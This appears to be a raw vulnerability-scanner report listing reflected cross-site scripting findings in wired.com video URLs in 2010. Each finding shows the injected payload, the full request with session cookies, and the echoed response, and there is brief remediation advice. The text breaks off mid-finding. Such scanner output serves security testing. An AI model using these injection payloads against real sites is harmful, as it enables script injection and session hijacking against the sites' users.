HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=289 Expires: Mon, 22 Nov 2010 00:43:05 GMT Date: Mon, 22 Nov 2010 00:38:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106796
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload e600f--><script>alert(1)</script>f14c661e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoe600f--><script>alert(1)</script>f14c661e1/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29487 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:16 GMT Date: Mon, 22 Nov 2010 00:42:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoe600f--><script>alert(1)</script>f14c661e1/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8743f"><a>96446f44fa8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video8743f"><a>96446f44fa8/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29452 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:46:32 GMT Date: Mon, 22 Nov 2010 00:41:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video8743f"><a>96446f44fa8 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdee2"-alert(1)-"8c37db9a46d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videosbdee2"-alert(1)-"8c37db9a46d/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:48:05 GMT Date: Mon, 22 Nov 2010 00:43:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106787
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 408ee"><a>eb79182c383 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos408ee"><a>eb79182c383/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:17 GMT Date: Mon, 22 Nov 2010 00:42:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos408ee"><a>eb79182c383 c_latest"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a7f3"-alert(1)-"4f2d0accdf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest6a7f3"-alert(1)-"4f2d0accdf/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=279 Expires: Mon, 22 Nov 2010 00:48:46 GMT Date: Mon, 22 Nov 2010 00:44:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106830
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... t/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d617"><a>93407c07ac1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest7d617"><a>93407c07ac1/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:48:09 GMT Date: Mon, 22 Nov 2010 00:43:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest7d617"><a>93407c07ac1"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67771"-alert(1)-"6876dab4361 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/181581663367771"-alert(1)-"6876dab4361/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:23 GMT Date: Mon, 22 Nov 2010 00:44:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... t/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 417f2"-alert(1)-"53afbfa2f39 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows417f2"-alert(1)-"53afbfa2f39/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:29 GMT Date: Mon, 22 Nov 2010 00:44:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... t/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40b82"-alert(1)-"5c1018b5684 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/65087585700140b82"-alert(1)-"5c1018b5684 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=286 Expires: Mon, 22 Nov 2010 00:49:44 GMT Date: Mon, 22 Nov 2010 00:44:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... t/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload bae29--><script>alert(1)</script>d1b8c531380 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videobae29--><script>alert(1)</script>d1b8c531380/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29459 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:32 GMT Date: Mon, 22 Nov 2010 00:36:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videobae29--><script>alert(1)</script>d1b8c531380/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef811"><a>b1ea23f2dd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videoef811"><a>b1ea23f2dd6/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29420 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:40:50 GMT Date: Mon, 22 Nov 2010 00:35:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videoef811"><a>b1ea23f2dd6 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c265"-alert(1)-"61910eb5ad7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos9c265"-alert(1)-"61910eb5ad7/latest/1815816633/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=272 Expires: Mon, 22 Nov 2010 00:41:55 GMT Date: Mon, 22 Nov 2010 00:37:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 154f4"><a>d2d236a0fa9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos154f4"><a>d2d236a0fa9/latest/1815816633/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:38 GMT Date: Mon, 22 Nov 2010 00:36:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos154f4"><a>d2d236a0fa9 c_latest"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed5fe"><a>50a1865d9c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latested5fe"><a>50a1865d9c9/1815816633/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:25 GMT Date: Mon, 22 Nov 2010 00:37:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106766
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latested5fe"><a>50a1865d9c9"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf068"-alert(1)-"1f8767402b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latestbf068"-alert(1)-"1f8767402b1/1815816633/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:30 GMT Date: Mon, 22 Nov 2010 00:38:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106773
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5270b"-alert(1)-"b5f96d84bd1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/18158166335270b"-alert(1)-"b5f96d84bd1/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:48 GMT Date: Mon, 22 Nov 2010 00:38:48 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc71f"-alert(1)-"d498532879a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
